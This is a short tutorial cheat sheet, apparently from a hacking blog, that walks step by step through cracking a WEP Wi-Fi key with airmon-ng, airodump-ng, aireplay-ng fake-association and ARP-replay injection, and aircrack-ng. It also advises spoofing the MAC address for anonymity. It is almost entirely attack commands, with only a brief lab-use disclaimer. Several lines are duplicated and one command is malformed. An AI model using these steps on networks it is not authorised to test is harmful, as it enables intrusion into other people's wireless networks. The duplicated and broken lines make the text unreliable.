AIRCRACK
BASICS
By:
@donds https://hackvault.blogspot.com
The instructions below are strictly for
research and educational purposes only.
Please setup a test lab, it is illegal to hack an AP without permission.
The steps below might not work, but it does
work most of the time. It works very well when a client is connected to the AP,
but of course you can fake that also.
TIPS: Change your monitoring interface's MAC address for anonymity and to make is easy to remember: Example 11:22:33:44:55:66 - Use MACCHANGER.
TIPS: Change your monitoring interface's MAC address for anonymity and to make is easy to remember: Example 11:22:33:44:55:66 - Use MACCHANGER.
Let’s start AirCrackin’
PHASE 1
-OPEN A TERMINAL WINDOW (Terminal 1)
1. Set the interface to monitor mode:
1. Set the interface to monitor mode:
airmon-ng start [interface]
2. To recon the airwaves use airodump-ng:
airodump-ng [interface]
3. Select a victim and take note of the SSID, channel and mac address.
3. Select a victim and take note of the SSID, channel and mac address.
4. Stop airodump-ng, then restart it with the
write option to start catching the IVs.
airodump-ng -c [channel] -w
[filename] [interface]
-LEAVE Terminal 1 PROCESS RUNNING
PHASE 2
-OPEN A SECOND TERMINAL WINDOW (Terminal 2)
5. Inject some "care packages" to
generate IV's. Get creative! Take your pick.
NOTE: To test the subjects' ability for packet
injection, use the following code. You
are looking for a 100% injection result. aireplay-ng -9 -e [vic ssid] -a [vic mac]
[interface]
Fake Associations for the victim AP
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
OR use this for picky Access Points
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
You have to get a successful association before you can continue. Your ARP request replay packets will not generate any initialization vectors (IVs) if you are not associated with the AP.
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
You have to get a successful association before you can continue. Your ARP request replay packets will not generate any initialization vectors (IVs) if you are not associated with the AP.
Send out ARP request replay modes
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
-LEAVE Terminal 2
PROCESS RUNNING
PHASE 3
-OPEN A THIRD TERMINAL WINDOW (Terminal 3)
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go. You can also use the FMS/Korek method by adding -K on the code above.
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go. You can also use the FMS/Korek method by adding -K on the code above.
You will need approx. 250,000 IV's for a 64 bit
key, 1.5M IVs for a 128 bit key.
For the PTW method, you'll need 20,000 packets
for 64bit and 40,000 packets for 128bits.
